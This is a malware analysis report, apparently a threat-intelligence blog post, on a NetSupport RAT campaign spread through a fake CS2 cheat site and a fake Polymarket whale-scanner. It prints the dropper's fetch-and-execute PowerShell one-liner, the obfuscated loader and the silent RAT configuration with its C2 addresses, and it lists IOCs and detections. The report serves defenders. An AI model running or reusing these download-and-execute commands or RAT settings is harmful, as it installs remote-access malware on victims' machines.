Two Lures, One Operator: NetSupport RAT Ships on CS2 Cheats and a Fake Polymarket Whale Scanner From a Single Proton66 Server

TL;DR

On April 8, 2026, a tiny 81-byte PowerShell dropper named iridia.ps1 surfaced on MalwareBazaar (reported by burger403). Following the breadcrumbs leads to a dual-lure NetSupport Manager RAT operation run by a single operator out of a single Russian bulletproof host:

• A CS2 "Iridia Cheats" lure at iridiacheats.dev
• A "Polymarket Smart Money Scanner" whale-tracker lure at polymarketscanner.dev

Both lures deliver identical NetSupport RAT binaries, use the same 7-Zip archive passwords (falos / ilil), and beacon to four C2 domains that all resolve to the same IP: 193.143.1.21 — a Windows server in St. Petersburg on Proton66 OOO (AS198953), a Russian hoster with a long track record as a bulletproof provider.

What this report adds to the public record:

• Links the iridiacheats.dev CS2 cheat lure and the polymarketscanner.dev Polymarket scanner lure to a single operator via identical RAT binaries, 7z passwords, gateway config templates, and build-machine artifacts
• Captures several operator OPSEC failures: a pirated NetSupport license (NSM1234), a build-machine hostname (ultimate-intel0), a C2-server hostname exposed via RDP certificate (WIN-425ORDLIMJB), and an administrator SID from the build machine
• Documents the actor's User-Agent-gated payload delivery — the distribution endpoints return the malicious loader only to PowerShell user agents and serve a Cloudflare 403 to browsers
• Notes an older Polymarket C2 tier that predates the current campaign by nearly three months (registered Jan 22, 2026), suggesting the Polymarket infrastructure was pre-staged before the actor layered in the CS2 lure earlier this month

Hat tip to burger403 for the sample on MalwareBazaar. If you've published prior reporting on this operator, the ultimate-intel0 build artifact, the NSM1234 license, or the Proton66 WIN-425ORDLIMJB node, please reach out — we'll update and credit.

---

The Sample

Field	Value
Filename	iridia.ps1
File Type	PowerShell script, 81 bytes
SHA256	d38bf86953ccbdf85f3f371cc196abc43d415d5ea19751181551a0e530662083
MD5	7d60d78db2c86ba4871eb03b94e9b27c
First seen on MalwareBazaar	2026-04-08 09:37 UTC
Reporter	burger403
MB Tags	NetSupport, ps1, RAT

The full content of the dropper is a one-liner:

powershell -command "$install='CS2 MOD'; iwr iridiacheats.dev/install -useb| iex"

$install is a campaign tracker. -useb is an alias for -UseBasicParsing, suppressing the legacy Internet Explorer parser.

Infection Chain

Stage 1   iridia.ps1 (81B)  →  iex (irm iridiacheats.dev/install)
Stage 2   Obfuscated IEX:   sv o ie; .((gv o).Value+'X')(irm iridiacheats.dev/fal.php)
Stage 3   fal.php (675B)    →  creates %LOCALAPPDATA%\NetService\
                               downloads gggs.7z (pw: falos), lin.7z (pw: ilil), 7z.exe, 7z.dll
                               launches Service.exe via explorer.exe (PPID spoof)
Stage 4   NetSupport RAT    →  client32.exe + PCICL32.DLL
                               C2: kssaprraemdda.com:443 / psosenslsddaev.com:443

The distribution endpoint is User-Agent gated. A curl or browser user agent to https://iridiacheats.dev/install returns a Cloudflare 403 block page. Only PowerShell user agents receive the obfuscated loader. That loader uses variable indirection to construct the string iex:

sv o ie                       # $o = 'ie'
.((gv o).Value + 'X')         # invoke ('ie' + 'X') = iex
  (irm https://iridiacheats.dev/fal.php)

fal.php drops NetSupport Manager 12.01 with a v10.60 loader stub, installs into %LOCALAPPDATA%\NetService\, launches Service.exe through explorer.exe for PPID spoofing, and drops service.lnk into the Startup folder for persistence. The client32.ini is configured for fully silent operation:

[Client]
ShowUIOnConnect=0
silent=1
SysTray=0
SKMode=1
DisableDisconnect=1
DisableClientConnect=1

[HTTP]
GatewayAddress=kssaprraemdda.com:443
SecondaryGateway=psosenslsddaev.com:443
Port=443

Two Lures, One Operator

	Iridia (CS2 cheats)	Polymarket (whale scanner)
Distribution domain	iridiacheats.dev	polymarketscanner.dev
Domain created	2026-04-06	2026-04-02
Payload archive	gggs.7z	at.7z
Primary C2	kssaprraemdda.com	jakkakaskakasj.com
Secondary C2	psosenslsddaev.com	jasjdpoekkqwda.com
C2 registered	2026-04-06	2026-01-22
RAT binaries	Identical	Identical
7z passwords	falos / ilil	falos / ilil
Gateway security key pattern	FJ;M@CDG9J=PBEGG;N@DDH	FL;B@EDI9D>GBMGH<BAEEK:F>L
Decoy UI	Plain "Installation complete!"	Full fake "Polymarket Smart Money Scanner v3.8.1 (Stealth Edition)" console

The Polymarket branch ships a ~400-line PowerShell decoy that simulates a live whale-tracking console — fake wallet fingerprinting with progress bars, fake cross-chain flow traces (Polygon, Base, Arbitrum), fabricated high-winrate wallet clusters with realistic position sizes, a fake "$12.84M inflow" alert across correlated markets, and a countdown timer suggesting a live refresh. Its purpose is purely to keep the victim watching the screen while the RAT finishes installing in the background.

Infrastructure Map

   Distribution tier (Cloudflare)
   ├── iridiacheats.dev       → 104.21.52.179 (CF)
   └── polymarketscanner.dev  → 104.21.14.134 (CF)
                │
                ▼  payload pull
   ┌────────────────────────────────────────────┐
   │     C2 tier                                 │
   │     193.143.1.21  —  Proton66 OOO, RU      │
   │     Hostname: WIN-425ORDLIMJB              │
   │                                             │
   │     Port 443    NSM Gateway                 │
   │     Port 3389   RDP (operator access)       │
   │                                             │
   │     kssaprraemdda.com    (Iridia  primary) │
   │     psosenslsddaev.com   (Iridia  backup)  │
   │     jakkakaskakasj.com   (Poly   primary)  │
   │     jasjdpoekkqwda.com   (Poly   backup)   │
   └────────────────────────────────────────────┘

All four C2 domains were registered through NiceNIC (Hong Kong) in two bursts — the Polymarket pair in January 2026, within 100 minutes of each other, and the Iridia pair on April 6 within 16 minutes of each other. Every domain resolves to a single server at 193.143.1.21 — same provider, same box, same hostname.

The C2 box

Attribute	Value
IP	193.143.1.21
Hostname (RDP cert)	WIN-425ORDLIMJB
RDP cert created	2026-02-05 15:56 UTC
OS	Windows (via nmap)
Open ports	443 (NSM Gateway), 3389 (RDP)
Provider	Proton66 OOO
ASN	AS198953
Location	St. Petersburg, Russia
Network	193.143.1.0/24
Abuse	abuse@proton66.ru

Proton66 has been repeatedly named in community threat intelligence as a bulletproof host; its registered address — District No. 54, Iskrovsky Pr-kt, D. 21, Lit. U, Kv. 218, 193230, St. Petersburg — has hosted C2 infrastructure across multiple unrelated campaigns this year alone.

Operator OPSEC Failures

1. Pirated NetSupport license — serial NSM1234, licensee NSM1234. A $500+ commercial remote-access product being distributed with a throwaway serial is not exactly a subtle identifier.
2. Build machine hostname leak — the .lnk metadata in service.lnk exposes the build-machine path C:\Users\Administrator\AppData\Local\NetService\service.exe and the hostname ultimate-intel0.
3. Build machine SID — S-1-5-21-3340606691-2803584206-3274291654-500 (built-in Administrator). Unique to the actor's development box.
4. C2 server hostname via RDP cert — WIN-425ORDLIMJB, certificate created 2026-02-05. Pivotable across Censys/Shodan historical data.
5. Single-IP consolidation — one box serves both lure campaigns, one RDP port exposes the operator.
6. Registrar clustering — all four C2 domains registered at NiceNIC HK. One abuse report, four takedowns.
7. Temporal bursts — domains registered within minutes of each other. Makes this pattern trivially pivotable.
8. Workspace path leak — [_Info] in client32.ini reveals the file was edited at C:\Users\Administrator\Desktop\client32u.ini.

Confidence Notes

Medium confidence — single operator. Insufficient data to name an individual, but the operational fingerprint is coherent: identical binaries across both campaigns, identical archive passwords, identical gateway config template, same RAT install path, same build-machine artifacts in .lnk metadata, and a shared C2 server. The longer-lived Polymarket infrastructure (Jan 22) suggests the actor pre-staged the whale-tracker campaign months before layering the CS2 cheat lure on top of it earlier this month.

Target profile: gamers chasing CS2 cheats and crypto/prediction-market traders chasing Polymarket edge. Monetization is most likely some combination of access resale, wallet theft, and credential harvesting via a downstream stealer.

Detections & Hunting

• Network: block 193.143.1.21, plus all six domains listed below. NetSupport Manager gateway traffic on 443 can be identified by the absence of a valid TLS cert (raw NSM protocol on the HTTPS port).
• Endpoint: alert on %LOCALAPPDATA%\NetService\ directory creation, on Service.exe running from non-standard paths, and on PCICL32.DLL sideloading events.
• Process: PowerShell running iwr + iex against .dev TLDs with -useb is a strong first-cut filter, particularly when the parent process is explorer.exe.
• Startup persistence: any new .lnk dropped under %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ pointing into NetService.

IOCs

Dropper chain

d38bf86953ccbdf85f3f371cc196abc43d415d5ea19751181551a0e530662083  iridia.ps1
0c36c1062ada3b12c771e94a125233f76c8d1a73108fb68b225605313a533197  fal.php
afe6bc8f12b08c0d52a20a4ef96c00c2187711348d5a4419ed96edff16fd4d15  gggs.7z  (Iridia)
3084c055d2d79212308051a05f1859053cf0e313792d0b2658fa47b4e027bcb6  at.7z    (Polymarket)
47f53b727d4e09c44c5595c747956ac5b4801341e1bb9195f31cec33548abf66  lin.7z

NetSupport RAT components

275e5b085534f64313b50cbdcb08ecd59c57d21c96bb937f140ee92a3d27f792  Service.exe
b6d4ad0231941e0637485ac5833e0fdc75db35289b54e70f3858b70d36d04c80  PCICL32.DLL
2cc8ebea55c06981625397b04575ed0eaad9bb9f9dc896355c011a62febe49b5  AudioCapture.dll
52506d242a55051fd78ca4aa28b347fa14cdcc495f83a4e8a3aec36e1c73b4ea  service.lnk

Network

193.143.1.21                  C2 server (Proton66, RU)
kssaprraemdda.com             Iridia primary C2
psosenslsddaev.com            Iridia secondary C2
jakkakaskakasj.com            Polymarket primary C2
jasjdpoekkqwda.com            Polymarket secondary C2
iridiacheats.dev              Iridia distribution (CF)
polymarketscanner.dev         Polymarket distribution (CF)

Host

%LOCALAPPDATA%\NetService\
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\service.lnk
WIN-425ORDLIMJB                 C2 server hostname
ultimate-intel0                 Build machine hostname
S-1-5-21-3340606691-2803584206-3274291654-500  Build machine Administrator SID
NSM1234                         Pirated NetSupport license

---

GHOST — Breakglass Intelligence "One indicator. Total infrastructure."